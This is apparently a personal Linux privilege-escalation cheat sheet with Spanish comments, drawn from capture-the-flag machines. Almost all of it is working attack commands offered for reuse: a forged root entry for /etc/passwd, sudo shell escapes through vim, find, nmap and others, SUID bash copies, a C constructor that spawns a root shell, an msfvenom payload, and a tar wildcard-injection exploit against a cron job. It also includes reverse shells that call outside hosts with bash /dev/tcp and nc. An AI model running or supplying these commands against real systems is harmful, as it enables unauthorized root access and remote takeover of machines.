# buscar binarios con permisos SUID
find / -perm -u=s -type f 2>/dev/null

# creacion de passwords para /etc/passwd
openssl passwd -1 -salt SALT PASSWORD
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

# bash privesc
sudo /etc/mp3backups/backup.sh -c "chmod u+s /bin/bash"
sudo bash -p
bash -i &> /dev/tcp/10.10.14.162/1313 0>&1


# suid - escalada de privilegios
sudo /usr/sbin/iftop -->!sh
sudo find . -exec /bin/sh \; -quit
sudo nano --> CTRL+R + CTRL+X --> reset; sh 1>&0 2>&0
sudo vim -c ':!/bin/sh'
sudo man man --> !/bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
sudo less /etc/profile --> !/bin/sh
sudo ftp --> !sh
sudo nmap --interactive --> !sh
TERM=sudo more /etc/profile --> !sh
/usr/bin/capsh --uid=0 --gid=0 -- -c '/bin/bash'

# script para escalar privilegios en bash
#!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
/tmp/rootbash -p

# script para escalar privilegios en C
include <stdio.h>
include <stdlib.h>
static void inject() __attribute__((constructor));

void inject() {
        setuid(0);
        system("/bin/bash -p");
}

# msfvenom 
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
chmod +xs /tmp/nfs/shell.elf
/tmp/shell.elf

# tar exploit 
cat /home/milesdyson/backups/backup.sh # es un cronjob
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
---
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.14.4.164 1234 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
